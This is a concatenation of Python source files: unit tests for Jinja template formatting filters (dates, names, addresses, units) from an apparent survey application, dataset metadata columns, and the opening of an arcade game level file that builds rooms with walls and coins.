format_value = format_multilined_string(self.autoescape_context, new_line)
self.assertEqual(format_value, 'this is on a new<br>line')
def test_format_multilined_string_matches_new_line(self):
# Given
new_line = 'this is on a new\nline'
# When
format_value = format_multilined_string(self.autoescape_context,
new_line)
self.assertEqual(format_value, 'this is on a new<br>line')
def test_format_multilined_string_matches_carriage_return_new_line(self):
# Given
new_line = 'this is on a new\r\nline'
# When
format_value = format_multilined_string(self.autoescape_context, new_line)
self.assertEqual(format_value, 'this is on a new<br>line')
def test_format_multilined_string(self):
# Given
new_line = 'this is\ron a\nnew\r\nline'
# When
format_value = format_multilined_string(self.autoescape_context,
new_line)
self.assertEqual(format_value, 'this is<br>on a<br>new<br>line')
def test_format_multilined_string_auto_escape(self):
# Given
new_line = '<'
# When
format_value = format_multilined_string(self.autoescape_context, new_line)
self.assertEqual(str(format_value), '<')
def test_get_current_date(self):
# Given
date_format = '%-d %B %Y'
# When
format_value = get_current_date(self.autoescape_context)
current_date = as_london_tz(datetime.utcnow()).strftime(date_format)
# Then
self.assertEqual(format_value, "<span class='date'>{date}</span>".format(date=current_date))
def test_format_date(self):
# Given
date = '2017-01-01'
# When
with self.app_request_context('/'):
format_value = format_date(self.autoescape_context, date)
# Then
self.assertEqual(format_value, "<span class='date'>1 January 2017</span>")
def test_format_date_month_year(self):
# Given
date = '2017-01'
# When
with self.app_request_context('/'):
format_value = format_date(self.autoescape_context, date)
# Then
self.assertEqual(format_value, "<span class='date'>January 2017</span>")
def test_format_date_markup(self):
# Given
date = [Markup('2017-01')]
# When
with self.app_request_context('/'):
format_value = format_date(self.autoescape_context, date)
# Then
self.assertEqual(format_value, "<span class='date'>January 2017</span>")
def test_format_date_non_string(self):
# Given
date = 123
# When
format_value = format_date(self.autoescape_context, date)
# Then
self.assertEqual(format_value, 123)
def test_format_date_none(self):
# Given
date = None
# When
format_value = format_date(self.autoescape_context, date)
# Then
self.assertIsNone(format_value)
def test_format_date_time_in_bst(self):
# Given
date_time = '2018-03-29T11:59:13.528680'
# When
with self.app_request_context('/'):
format_value = format_datetime(self.autoescape_context, date_time)
# Then
self.assertEqual(format_value, "<span class='date'>29 March 2018 at 12:59</span>")
def test_format_date_time_in_gmt(self):
# Given
date_time = '2018-10-28T11:59:13.528680'
# When
with self.app_request_context('/'):
format_value = format_datetime(self.autoescape_context, date_time)
# Then
self.assertEqual(format_value, "<span class='date'>28 October 2018 at 11:59</span>")
def test_format_conditional_date_not_date(self):
# Given no test for integers this check was removed from jinja_filters
invalid_input = [('1', None),
('1-1-1', None)]
# When
for nonsense in invalid_input:
date1 = nonsense[0]
date2 = nonsense[1]
with self.assertRaises(Exception) as exception:
format_conditional_date(self.autoescape_context, date1, date2)
# Then
self.assertIn("does not match format '%Y-%m'", str(exception.exception))
def test_format_conditional_date_not_set(self):
# Given
# When
with self.assertRaises(Exception) as exception:
format_conditional_date(self.autoescape_context, None, None)
# Then
self.assertIn('No valid dates passed to format_conditional_dates filter', str(exception.exception))
def test_format_conditional_date(self):
# Given
datelist = [('2016-01-12', '2016-02-12', '12 January 2016'),
('2017-12-23', None, '23 December 2017'),
(None, '2017-12-24', '24 December 2017')]
# When
with self.app_request_context('/'):
for triple in datelist:
date1 = triple[0]
date2 = triple[1]
format_value = format_conditional_date(self.autoescape_context, date1, date2)
# Then
self.assertEqual(format_value, "<span class='date'>{date}</span>".format(date=triple[2]))
def test_calculate_years_difference(self):
with patch('app.setup.get_session_store', return_value=None):
# Given
ten_years_ago = (datetime.today()+relativedelta(years=-10)).strftime('%Y-%m-%d')
date_list = [('2017-01-30', '2018-01-30', '1 year'),
('2015-02-02', '2018-02-01', '2 years'),
('2016-02-29', '2017-02-28', '1 year'),
('2016-02-29', '2020-02-28', '3 years'),
(ten_years_ago, 'now', '10 years')]
for dates in date_list:
start_date = dates[0]
end_date = dates[1]
# When
calculated_value = calculate_years_difference(start_date, end_date)
# Then
self.assertEqual(calculated_value, dates[2])
def test_calculate_years_difference_none(self):
# Given
with self.assertRaises(Exception) as e:
# When
calculate_years_difference(None, '2017-01-17')
# Then
self.assertEqual('Valid date(s) not passed to calculate_years_difference filter', str(e.exception))
def test_format_date_range(self):
# Given
start_date = '2017-01-01'
end_date = '2017-01-31'
# When
with self.app_request_context('/'):
format_value = format_date_range(self.autoescape_context, start_date, end_date)
# Then
self.assertEqual(format_value, "<span class='date'>1 January 2017</span> to <span class='date'>31 January 2017</span>")
def test_format_date_range_missing_end_date(self):
# Given
start_date = '2017-01-01'
# When
with self.app_request_context('/'):
format_value = format_date_range(self.autoescape_context, start_date)
# Then
self.assertEqual(format_value, "<span class='date'>1 January 2017</span>")
def test_format_household_member_name(self):
# Given
name = ['John', 'Doe']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'John Doe')
def test_format_household_member_name_no_surname(self):
# Given
name = ['John', '']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'John')
def test_format_household_member_name_surname_is_none(self):
# Given
name = ['John', None]
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'John')
def test_format_household_member_name_no_first_name(self):
# Given
name = ['', 'Doe']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'Doe')
def test_format_household_member_name_first_name_is_none(self):
# Given
name = [None, 'Doe']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'Doe')
def test_format_household_member_name_first_middle_and_last(self):
# Given
name = ['John', 'J', 'Doe']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'John J Doe')
def test_format_household_member_name_no_middle_name(self):
# Given
name = ['John', '', 'Doe']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'John Doe')
def test_format_household_member_name_middle_name_is_none(self):
# Given
name = ['John', None, 'Doe']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'John Doe')
def test_format_household_member_name_trim_spaces(self):
# Given
name = ['John ', ' Doe ']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'John Doe')
def test_format_household_member_name_possessive(self):
# Given
name = ['John', 'Doe']
# When
format_value = format_household_member_name_possessive(name)
self.assertEqual(format_value, 'John Doe\u2019s')
def test_format_household_member_name_possessive_with_no_names(self):
# Given
name = [Undefined(), Undefined()]
# When
format_value = format_household_member_name_possessive(name)
self.assertIsNone(format_value)
def test_format_household_member_name_possessive_trailing_s(self):
# Given
name = ['John', 'Does']
# When
format_value = format_household_member_name_possessive(name)
self.assertEqual(format_value, 'John Does\u2019')
def test_concatenated_list(self):
# Given
list_items = ['1 The ONS', 'Newport', 'NP108XG']
# When
format_value = concatenated_list(list_items)
self.assertEqual(format_value, '1 The ONS, Newport, NP108XG')
def test_concatenated_list_one_entry(self):
# Given
list_items = ['One entry']
# When
format_value = concatenated_list(list_items)
self.assertEqual(format_value, 'One entry')
def test_concatenated_list_trim_white_spaces_and_trailing_commas(self):
# Given
list_items = ['', '1 The ONS ', 'Newport ', ' NP108XG', '']
# When
format_value = concatenated_list(list_items)
self.assertEqual(format_value, '1 The ONS, Newport, NP108XG')
def test_format_percentage(self):
self.assertEqual(format_percentage('100'), '100%')
self.assertEqual(format_percentage(100), '100%')
self.assertEqual(format_percentage(4.5), '4.5%')
def test_format_number_to_alphabetic_letter(self):
self.assertEqual(format_number_to_alphabetic_letter(0), 'a')
self.assertEqual(format_number_to_alphabetic_letter(4), 'e')
self.assertEqual(format_number_to_alphabetic_letter(25), 'z')
self.assertEqual(format_number_to_alphabetic_letter(-1), '')
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='en_GB'))
def test_format_unit(self):
self.assertEqual(format_unit('length-meter', 100), '100 m')
self.assertEqual(format_unit('length-centimeter', 100), '100 cm')
self.assertEqual(format_unit('length-mile', 100), '100 mi')
self.assertEqual(format_unit('length-kilometer', 100), '100 km')
self.assertEqual(format_unit('area-square-meter', 100), '100 m²')
self.assertEqual(format_unit('area-square-centimeter', 100), '100 cm²')
self.assertEqual(format_unit('area-square-kilometer', 100), '100 km²')
self.assertEqual(format_unit('area-square-mile', 100), '100 sq mi')
self.assertEqual(format_unit('area-hectare', 100), '100 ha')
self.assertEqual(format_unit('area-acre', 100), '100 ac')
self.assertEqual(format_unit('volume-cubic-meter', 100), '100 m³')
self.assertEqual(format_unit('volume-cubic-centimeter', 100), '100 cm³')
self.assertEqual(format_unit('volume-liter', 100), '100 l')
self.assertEqual(format_unit('volume-hectoliter', 100), '100 hl')
self.assertEqual(format_unit('volume-megaliter', 100), '100 Ml')
self.assertEqual(format_unit('duration-hour', 100), '100 hrs')
self.assertEqual(format_unit('duration-hour', 100, 'long'), '100 hours')
self.assertEqual(format_unit('duration-year', 100, 'long'), '100 years')
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='cy'))
def test_format_unit_welsh(self):
self.assertEqual(format_unit('duration-hour', 100), '100 awr')
self.assertEqual(format_unit('duration-year', 100), '100 bl')
self.assertEqual(format_unit('duration-hour', 100, 'long'), '100 awr')
self.assertEqual(format_unit('duration-year', 100, 'long'), '100 mlynedd')
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='en_GB'))
def test_format_unit_input_label(self):
self.assertEqual(format_unit_input_label('length-meter'), 'm')
self.assertEqual(format_unit_input_label('length-centimeter'), 'cm')
self.assertEqual(format_unit_input_label('length-mile'), 'mi')
self.assertEqual(format_unit_input_label('length-kilometer'), 'km')
self.assertEqual(format_unit_input_label('area-square-meter'), 'm²')
self.assertEqual(format_unit_input_label('area-square-centimeter'), 'cm²')
self.assertEqual(format_unit_input_label('area-square-kilometer'), 'km²')
self.assertEqual(format_unit_input_label('area-square-mile'), 'sq mi')
self.assertEqual(format_unit_input_label('area-hectare'), 'ha')
self.assertEqual(format_unit_input_label('area-acre'), 'ac')
self.assertEqual(format_unit_input_label('volume-cubic-meter'), 'm³')
self.assertEqual(format_unit_input_label('volume-cubic-centimeter'), 'cm³')
self.assertEqual(format_unit_input_label('volume-liter'), 'l')
self.assertEqual(format_unit_input_label('volume-hectoliter'), 'hl')
self.assertEqual(format_unit_input_label('volume-megaliter'), 'Ml')
self.assertEqual(format_unit_input_label('duration-hour'), 'hr')
self.assertEqual(format_unit_input_label('duration-hour', 'long'), 'hours')
self.assertEqual(format_unit_input_label('duration-year'), 'yr')
self.assertEqual(format_unit_input_label('duration-year', 'long'), 'years')
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='cy'))
def test_format_unit_input_label_welsh(self):
self.assertEqual(format_unit_input_label('duration-hour'), 'awr')
self.assertEqual(format_unit_input_label('duration-hour', 'long'), 'awr')
self.assertEqual(format_unit_input_label('duration-year'), 'bl')
self.assertEqual(format_unit_input_label('duration-year', 'long'), 'flynedd')
def test_format_year_month_duration(self):
with self.app_request_context('/'):
self.assertEqual(format_duration({'years': 5, 'months': 4}), '5 years 4 months')
self.assertEqual(format_duration({'years': 5, 'months': 0}), '5 years')
self.assertEqual(format_duration({'years': 0, 'months': 4}), '4 months')
self.assertEqual(format_duration({'years': 1, 'months': 1}), '1 year 1 month')
self.assertEqual(format_duration({'years': 0, 'months': 0}), '0 months')
def test_format_year_duration(self):
with self.app_request_context('/'):
self.assertEqual(format_duration({'years': 5}), '5 years')
self.assertEqual(format_duration({'years': 1}), '1 year')
self.assertEqual(format_duration({'years': 0}), '0 years')
def test_format_month_duration(self):
with self.app_request_context('/'):
self.assertEqual(format_duration({'months': 5}), '5 months')
self.assertEqual(format_duration({'months': 1}), '1 month')
self.assertEqual(format_duration({'months': 0}), '0 months')
def test_format_unordered_list(self):
list_items = [['item 1', 'item 2']]
formatted_value = format_unordered_list(self.autoescape_context, list_items)
expected_value = '<ul><li>item 1</li><li>item 2</li></ul>'
self.assertEqual(expected_value, formatted_value)
def test_format_unordered_list_with_no_input(self):
list_items = []
formatted_value = format_unordered_list(self.autoescape_context, list_items)
self.assertEqual('', formatted_value)
def test_format_unordered_list_with_empty_list(self):
list_items = [[]]
formatted_value = format_unordered_list(self.autoescape_context, list_items)
self.assertEqual('', formatted_value)
def test_max_value(self):
# Given
two_ints = (1, 2)
# When
max_of_two = max_value(*two_ints)
# Then
self.assertEqual(max_of_two, 2)
def test_max_value_none(self):
# Given
one_int = (1, None)
# When
max_of_two = max_value(*one_int)
# Then
self.assertEqual(max_of_two, 1)
def test_max_value_undefined(self):
# Given
args = ('foo', Undefined())
# When
with self.assertRaises(Exception) as exception:
max_value(*args)
# Then
self.assertIn(
"Cannot determine maximum of incompatible types max(<class 'str'>,"
" <class 'jinja2.runtime.Undefined'>)", str(exception.exception))
def test_max_values_incompatible(self):
# Given
args = (1, 'abc')
# When
with self.assertRaises(Exception) as exception:
max_value(*args)
# Then
self.assertIn(
"Cannot determine maximum of incompatible types max(<class 'int'>,"
" <class 'str'>)", str(exception.exception))
def test_max_values_compatible(self):
# Given
args = (-1, True)
# When
max_of_two = max_value(*args)
# Then
self.assertEqual(max_of_two, True)
def test_max_value_str(self):
# Given
two_str = ('a', 'abc')
# When
max_of_two = max_value(*two_str)
# Then
self.assertEqual(max_of_two, 'abc')
def test_max_value_date(self):
# Given
now = datetime.utcnow()
then = now - timedelta(seconds=60)
two_dates = (then, now)
# When
max_of_two = max_value(*two_dates)
# Then
self.assertEqual(max_of_two, now)
def test_min_value(self):
# Given
two_ints = (1, 2)
# When
min_of_two = min_value(*two_ints)
# Then
self.assertEqual(min_of_two, 1)
def test_min_value_none(self):
# Given
one_int = (1, None)
# When
min_of_two = min_value(*one_int)
# Then
self.assertEqual(min_of_two, 1)
def test_min_value_undefined(self):
# Given
args = ('foo', Undefined())
# When
with self.assertRaises(Exception) as exception:
min_value(*args)
# Then
self.assertIn(
"Cannot determine minimum of incompatible types min(<class 'str'>,"
" <class 'jinja2.runtime.Undefined'>)", str(exception.exception))
def test_min_values_incompatible(self):
# Given
args = (1, 'abc')
# When
with self.assertRaises(Exception) as exception:
min_value(*args)
# Then
self.assertIn(
"Cannot determine minimum of incompatible types min(<class 'int'>,"
" <class 'str'>)", str(exception.exception))
def test_min_values_compatible(self):
# Given
args = (-1, True)
# When
min_of_two = min_value(*args)
# Then
self.assertEqual(min_of_two, -1)
def test_min_value_str(self):
# Given
two_str = ('a', 'abc')
# When
min_of_two = min_value(*two_str)
# Then
self.assertEqual(min_of_two, 'a')
def test_min_value_date(self):
# Given
now = datetime.utcnow()
then = now - timedelta(seconds=60)
two_dates = (then, now)
# When
min_of_two = min_value(*two_dates)
# Then
self.assertEqual(min_of_two, then)
def test_get_question_title_with_title_value(self):
# Given
question_id = 'question'
context = SimpleNamespace(
parent={
'question': {
'id': 'question',
'title': 'question_title'
}
}
)
# When
title = get_question_title(context, question_id)
# Then
self.assertEqual(title, 'question_title')
def test_get_question_title_with_question_titles(self):
# Given
question_id = 'question'
context = SimpleNamespace(
parent={
'question': {
'id': 'question'
},
'content': {
'question_titles': {
'question': 'default_question_title'
}
}
}
)
# When
title = get_question_title(context, question_id)
# Then
self.assertEqual(title, 'default_question_title')
def test_get_answer_label_with_answer_label(self):
# Given
answer_id = 'answer'
question_id = 'question'
context = SimpleNamespace(
parent={
'question': {
'id': 'question',
'answers': [{
'id': 'answer',
'label': 'answer_label'
}]
}
}
)
# When
answer_label = get_answer_label(context, answer_id, question_id)
# Then
self.assertEqual(answer_label, 'answer_label')
def test_get_answer_label_with_no_answer_label_and_title(self):
# Given
answer_id = 'answer'
question_id = 'question'
context = SimpleNamespace(
parent={
'question': {
'id': 'question',
'title': 'question_title',
'answers': [{
'id': 'answer'
}]
}
}
)
# When
answer_label = get_answer_label(context, answer_id, question_id)
# Then
self.assertEqual(answer_label, 'question_title')
def test_get_answer_label_with_no_answer_label_and_question_titles(self):
# Given
answer_id = 'answer'
question_id = 'question'
context = SimpleNamespace(
parent={
'question': {
'id': 'question',
'answers': [{
'id': 'answer'
}]
},
'content': {
'question_titles': {
'question': 'default_question_title'
}
}
}
)
# When
answer_label = get_answer_label(context, answer_id, question_id)
# Then
self.assertEqual(answer_label, 'default_question_title')
def test_offset_date_from_day(self):
test_cases = [
# (Input Date, offset, day of week, expected output)
('2018-08-10', {}, 'SU', '2018-08-05'), # Friday outputs previous Sunday
('2018-08-05', {}, 'SU', '2018-07-29'), # Sunday outputs previous Sunday (Must be a full Sunday)
('2018-08-06', {}, 'SU', '2018-08-05'), # Monday outputs previous Sunday
('2018-08-06', {'days': -1}, 'SU', '2018-08-04'), # Previous sunday with -1 day offset
('2018-08-05', {'weeks': 1}, 'SU', '2018-08-05'), # Previous sunday with +1 month offset, back to input
('2018-08-10', {}, 'FR', '2018-08-03'), # Friday outputs previous Friday
('2018-08-10T13:32:20.365665', {}, 'FR', '2018-08-03'), # Ensure we can handle datetime input
('2018-08-10', {'weeks': 4}, 'FR', '2018-08-31'), # Friday outputs previous Friday + 4 weeks
('2018-08-10', {'bad_period': 4}, 'FR', '2018-08-03'), # Friday outputs previous Friday + nothing
('2018-08-10', {'years': 1}, 'FR', '2019-08-03'), # Friday outputs previous Friday + 1 year
('2018-08-10', {'years': 1, 'weeks': 1, 'days': 1}, 'FR', '2019-08-11'), # Friday outputs previous Friday + 1 year + 1 week + 1 day
]
for case in test_cases:
self.assertEqual(calculate_offset_from_weekday_in_last_whole_week(*case[0:3]), case[3])
def test_bad_day_of_week_offset_date_from_day(self):
with self.assertRaises(Exception):
calculate_offset_from_weekday_in_last_whole_week('2018-08-10', {}, 'BA')
def test_offset_date_defaults_to_now_if_date_not_passed(self):
with patch('app.jinja_filters.datetime') as mock_datetime:
# pylint: disable=unnecessary-lambda
mock_datetime.utcnow.return_value = datetime(2018, 8, 10)
mock_datetime.strftime.side_effect = lambda *args, **kw: datetime.strftime(*args, **kw)
result = calculate_offset_from_weekday_in_last_whole_week(None, {}, 'SU')
self.assertEqual(result, '2018-08-05')
def test_format_date_custom(self):
test_cases = [
# Input Date, date format, show year
('2018-08-14', 'EEEE d MMMM YYYY', 'Tuesday 14 August 2018'),
('2018-08-14', 'EEEE d MMMM', 'Tuesday 14 August'),
('2018-08-14', 'EEEE d', 'Tuesday 14'),
('2018-08-14', 'd MMMM YYYY', '14 August 2018'),
]
with self.app_request_context('/'):
for case in test_cases:
self.assertEqual(
format_date_custom(self.autoescape_context, *case[0:2]),
"<span class='date'>{}</span>".format(case[2])
)
def test_format_date_range_no_repeated_month_year(self):
test_cases = [
# Start Date, End Date, Date Format, Output Expected First, Output Expected Second
('2018-08-14', '2018-08-16', 'EEEE d MMMM YYYY', 'Tuesday 14', 'Thursday 16 August 2018'),
('2018-07-31', '2018-08-16', 'EEEE d MMMM YYYY', 'Tuesday 31 July', 'Thursday 16 August 2018'),
('2017-12-31', '2018-08-16', 'EEEE d MMMM YYYY', 'Sunday 31 December 2017', 'Thursday 16 August 2018'),
('2017-12-31', '2018-08-16', 'MMMM YYYY', 'December 2017', 'August 2018'),
('2018-08-14', '2018-08-16', 'MMMM YYYY', 'August 2018', 'August 2018'),
('2017-12-31', '2018-08-16', 'YYYY', '2017', '2018'),
('2017-07-31', '2018-08-16', 'YYYY', '2017', '2018'),
('2018-08-14', '2018-08-16', 'EEEE d', 'Tuesday 14', 'Thursday 16')
]
with self.app_request_context('/'):
for case in test_cases:
self.assertEqual(
format_date_range_no_repeated_month_year(self.autoescape_context, *case[0:3]),
"<span class='date'>{}</span> to <span class='date'>{}</span>".format(case[3], case[4])
)
@patch('app.jinja_filters.format_unordered_list')
def test_format_repeated_summaries_unformatted(self, patched_format): # pylint: disable=no-self-use
test_cases = [
# (input list, expected output)
([['John', 'Smith'], [['Jane', 'Sarah'], ['Smith', 'Smythe']]], ['John Smith', 'Jane Smith', 'Sarah Smythe']),
([['John', 'Smith']], ['John Smith']),
([['John', 'Smith'], ['Andy', 'Smith'], ['David', 'Smith']], ['John Smith', 'Andy Smith', 'David Smith']),
([[['Jane', 'Sarah'], ['Smith', 'Smith']]], ['Jane Smith', 'Sarah Smith']),
([[['David', 'Sarah'], ['Smith', 'Smith']]], ['David Smith', 'Sarah Smith']),
([[['David', 'Sarah'], ['', 'Smith']]], ['David', 'Sarah Smith']),
([['John', 'Smith'], [[], []]], ['John Smith'])
]
for case in test_cases:
format_repeating_summary(None, case[0])
# Format unordered list takes a list of lists
patched_format.assert_called_with(None, [[Markup(x) for x in case[1]]])
def test_format_repeated_summaries_no_input(self):
self.assertEqual('', format_repeating_summary(None, []))
def test_format_repeated_summaries_delimiters(self):
self.autoescape_context = Mock(autoescape=True)
output = format_repeating_summary(self.autoescape_context, [['', '51 Testing Gardens', '', 'Bristol', 'BS9 1AW']], delimiter=', ')
self.assertEqual(output, '<ul><li>51 Testing Gardens, Bristol, BS9 1AW</li></ul>')
def test_format_address_list_undefined_values(self):
user_entered_address = [Undefined(), Undefined(), Undefined(), Undefined(), Undefined()]
metadata_address = ['123', 'Testy', 'Place', 'Newport', 'NP5 7AR']
self.assertEqual('123<br />Testy<br />Place<br />Newport<br />NP5 7AR',
format_address_list(user_entered_address, metadata_address))
def test_format_address_list_missing_values(self):
user_entered_address = ['44', 'Testing', '', 'Swansea', '']
metadata_address = ['123', 'Testy', 'Place', 'Newport', 'NP5 7AR']
self.assertEqual('44<br />Testing<br />Swansea',
format_address_list(user_entered_address, metadata_address))
def test_format_address_list_None_value(self):
user_entered_address = [None, None, None, None, None]
metadata_address = [None, None, None, None, None]
with self.assertRaises(Exception):
format_address_list(user_entered_address, metadata_address)
def test_format_address_list_no_values_in_answer(self):
user_entered_address = ['', '', '', '', '']
metadata_address = ['123', 'Testy', 'Place', 'Newport', 'NP5 7AR']
self.assertEqual('123<br />Testy<br />Place<br />Newport<br />NP5 7AR',
format_address_list(user_entered_address, metadata_address))
def test_format_address_list_no_metadata(self):
user_entered_address = ['44', 'Testing', 'Gardens', 'Swansea', 'SA1 1AA']
metadata_address = []
self.assertEqual('44<br />Testing<br />Gardens<br />Swansea<br />SA1 1AA',
format_address_list(user_entered_address, metadata_address))
def test_format_address_list(self):
user_entered_address = ['44', 'Testing', 'Gardens', 'Swansea', 'SA1 1AA']
metadata_address = ['123', 'Testy', 'Place', 'Newport', 'NP5 7AR']
self.assertEqual('44<br />Testing<br />Gardens<br />Swansea<br />SA1 1AA',
format_address_list(user_entered_address, metadata_address))
def test_format_address_list_concatenated_list_no_values(self):
answer_address = ['', '', '']
metadata_address = ['', '', '']
with self.assertRaises(Exception) as error:
format_address_list(answer_address, metadata_address)
self.assertEqual('No valid address passed to format_address_list filter', error.exception.args[0])
| 38.005208
| 143
| 0.615952
| 4,321
| 36,485
| 4.926637
| 0.093265
| 0.11274
| 0.123309
| 0.052847
| 0.757187
| 0.680994
| 0.60668
| 0.528091
| 0.441798
| 0.405909
| 0
| 0.046522
| 0.25531
| 36,485
| 959
| 144
| 38.044838
| 0.736732
| 0.04495
| 0
| 0.324324
| 0
| 0.001689
| 0.176201
| 0.030794
| 0
| 0
| 0
| 0
| 0.302365
| 1
| 0.14527
| false
| 0.006757
| 0.013514
| 0
| 0.160473
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe90eb5d4db9dcb42eabad6cf0007baab0fc7833
| 18,598
|
py
|
Python
|
levels/sombie.py
|
superhasduper/PythonGames
|
64995d3e0b619006a2cf80d0da3c0fdf97db6fd9
|
[
"MIT"
] | 1
|
2019-07-07T19:55:39.000Z
|
2019-07-07T19:55:39.000Z
|
levels/sombie.py
|
superhasduper/PythonGames
|
64995d3e0b619006a2cf80d0da3c0fdf97db6fd9
|
[
"MIT"
] | null | null | null |
levels/sombie.py
|
superhasduper/PythonGames
|
64995d3e0b619006a2cf80d0da3c0fdf97db6fd9
|
[
"MIT"
] | null | null | null |
import arcade
import os
SPRITE_SCALING = 0.5
SPRITE_NATIVE_SIZE = 128
SPRITE_SIZE = int(SPRITE_NATIVE_SIZE * SPRITE_SCALING)
SCREEN_WIDTH = SPRITE_SIZE * 14
SCREEN_HEIGHT = SPRITE_SIZE * 10
MOVEMENT_SPEED = 5
COIN_SCALE = 0.7
class Room:
"""
This class holds all the information about the
different rooms.
"""
def __init__(self):
# You may want many lists. Lists for coins, monsters, etc.
self.wall_list = None
self.coin_list = None
self.door_list = None
self.smallpotion_list = None
self.bigpotion_list = None
# This holds the background images. If you don't want changing
# background images, you can delete this part.
self.background = None
self.score = 0
def setup_room_1():
"""
Create and return room 1.
If your program gets large, you may want to separate this into different
files.
"""
room = Room()
""" Set up the game and initialize the variables. """
# Sprite lists
room.wall_list = arcade.SpriteList()
room.door_list = arcade.SpriteList()
room.coin_list = arcade.SpriteList()
room.smallpotion_list = arcade.SpriteList()
room.bigpotion_list = arcade.SpriteList()
for y in (0, SCREEN_HEIGHT - SPRITE_SIZE):
# Loop for each box going across
for x in range(0, SCREEN_WIDTH, SPRITE_SIZE):
wall = arcade.Sprite("gravel_dirt.png", SPRITE_SCALING)
wall.left = x
wall.bottom = y
room.wall_list.append(wall)
# Create left and right column of boxes
for x in (0, SCREEN_WIDTH - SPRITE_SIZE):
# Loop for each box going across
for y in range(SPRITE_SIZE, SCREEN_HEIGHT - SPRITE_SIZE, SPRITE_SIZE):
# Skip making a block 4 and 5 blocks up on the right side
if (y != SPRITE_SIZE * 4 and y != SPRITE_SIZE * 5) or x == 0:
wall = arcade.Sprite("gravel_dirt.png", SPRITE_SCALING)
wall.left = x
wall.bottom = y
room.wall_list.append(wall)
for x in (0, SCREEN_WIDTH - SPRITE_SIZE):
# Loop for each box going across
for y in range(SPRITE_SIZE, SCREEN_HEIGHT - SPRITE_SIZE, SPRITE_SIZE):
if not (y != SPRITE_SIZE * 4 and y != SPRITE_SIZE * 5) or x == 0:
door = arcade.Sprite("fence.png", SPRITE_SCALING)
door.left = x
door.bottom = y
room.door_list.append(door)
wall = arcade.Sprite("gravel_dirt.png", SPRITE_SCALING)
wall.left = 7 * SPRITE_SIZE
wall.bottom = 5 * SPRITE_SIZE
room.wall_list.append(wall)
# If you want coins or monsters in a level, then add that code here.
# Load the background image for this level.
room.background = arcade.load_texture("g.png")
for i in range(300,600,75):
coin = arcade.Sprite("coin.png",COIN_SCALE)
coin.center_x = i
coin.center_y = 500
room.coin_list.append(coin)
smallpotion = arcade.Sprite("big.png",0.05)
smallpotion.center_x = 100
smallpotion.center_y = 900
room.smallpotion_list.append(smallpotion)
return room
def setup_room_2():
"""
Create and return room 2.
"""
room = Room()
""" Set up the game and initialize the variables. """
# Sprite lists
room.door_list = arcade.SpriteList()
room.wall_list = arcade.SpriteList()
room.coin_list = arcade.SpriteList()
room.smallpotion_list = arcade.SpriteList()
room.bigpotion_list = arcade.SpriteList()
# -- Set up the walls
# Create bottom and top row of boxes
# This y loops a list of two, the coordinate 0, and just under the top of window
for y in (0, SCREEN_HEIGHT - SPRITE_SIZE):
# Loop for each box going across
for x in range(0, SCREEN_WIDTH, SPRITE_SIZE):
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = x
wall.bottom = y
room.wall_list.append(wall)
# Create left and right column of boxes
for x in (0, SCREEN_WIDTH - SPRITE_SIZE):
# Loop for each box going across
for y in range(SPRITE_SIZE, SCREEN_HEIGHT - SPRITE_SIZE, SPRITE_SIZE):
# Skip making a block 4 and 5 blocks up
if (y != SPRITE_SIZE * 4 and y != SPRITE_SIZE * 5) or x != 0:
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = x
wall.bottom = y
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 1 * SPRITE_SIZE
wall.bottom = 6 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 1 * SPRITE_SIZE
wall.bottom = 3 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 2 * SPRITE_SIZE
wall.bottom = 5.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 2 * SPRITE_SIZE
wall.bottom = 3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 3 * SPRITE_SIZE
wall.bottom = 3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 4 * SPRITE_SIZE
wall.bottom = 3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 4 * SPRITE_SIZE
wall.bottom = 4.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 2 * SPRITE_SIZE
wall.bottom = 5.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 2 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 3 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 4 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 5 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
